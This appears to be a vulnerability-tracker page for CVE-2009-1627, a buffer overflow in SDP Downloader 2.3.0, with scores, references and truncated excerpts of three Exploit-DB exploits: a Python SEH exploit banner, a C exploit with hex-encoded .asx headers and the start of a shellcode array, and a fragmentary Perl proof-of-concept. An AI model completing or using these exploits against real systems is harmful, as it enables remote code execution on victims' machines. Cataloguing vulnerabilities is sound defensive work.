CVE-2009-1627
published 2009-05-12CVE-2009-1627: Stack-based buffer overflow in Streaming Download Project (SDP) Downloader 2.3.0 allows remote attackers to execute arbitrary code via a long .asf URL in the…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.33%
93.6th percentile
Stack-based buffer overflow in Streaming Download Project (SDP) Downloader 2.3.0 allows remote attackers to execute arbitrary code via a long .asf URL in the HREF attribute of a REF element in a .asx file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sdp_multimedia | streaming_download_project | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)
exploitdb·2009-04-27
CVE-2009-1627 SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)
SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)
---
#usage: exploit.py
#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm)
# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time.
print "**************************************************************************"
print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n"
print " Founder: Cyber-Zone"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
header1 = (
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
"\x2E\x
Exploit-DB
SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)
exploitdb·2009-04-27
CVE-2009-1627 SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)
SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)
---
/* SDP-BOF.c
* SDP Downloader Local Buffer overflow exploit [SEH]
* Credits : Cyber-Zone
* Exploit BY :
* SimO-s0fT ([email protected])
* Shoot to : Stack & r1z & Str0ke
*
*/
#include
#include
#include
#define OFFSET 529
#define NOP 0x90
char head1[]=
"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e"
"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54"
"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49"
"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d"
"\x22\x68\x74\x74\x70\x3a\x2f\x2f";
char head2[]=
"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59"
"\x3e\x3c\x2f\x41\x53\x58\x3e";
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\x
Exploit-DB
SDP Downloader 2.3.0 - '.asx' Local Heap Overflow (PoC)
exploitdb·2009-04-24
CVE-2009-1627 SDP Downloader 2.3.0 - '.asx' Local Heap Overflow (PoC)
SDP Downloader 2.3.0 - '.asx' Local Heap Overflow (PoC)
---
#!/usr/bin/perl
#
#
# Found By : Cyber-Zone (ABDELKHALEK) $EviLFILE") or die "ERROR ! :$EviLFILE\n";
print Boom $Header1;
print Boom $ProofOfConcept;
print Boom $Header2;
close(Boom);
print ("Figuigian Hacker !!!\n");
# milw0rm.com [2009-04-24]
No writeups or analysis indexed.
http://osvdb.org/54090http://secunia.com/advisories/34883http://www.securityfocus.com/bid/34712http://www.vupen.com/english/advisories/2009/1171https://www.exploit-db.com/exploits/8531https://www.exploit-db.com/exploits/8536http://osvdb.org/54090http://secunia.com/advisories/34883http://www.securityfocus.com/bid/34712http://www.vupen.com/english/advisories/2009/1171https://www.exploit-db.com/exploits/8531https://www.exploit-db.com/exploits/8536
2009-05-12
Published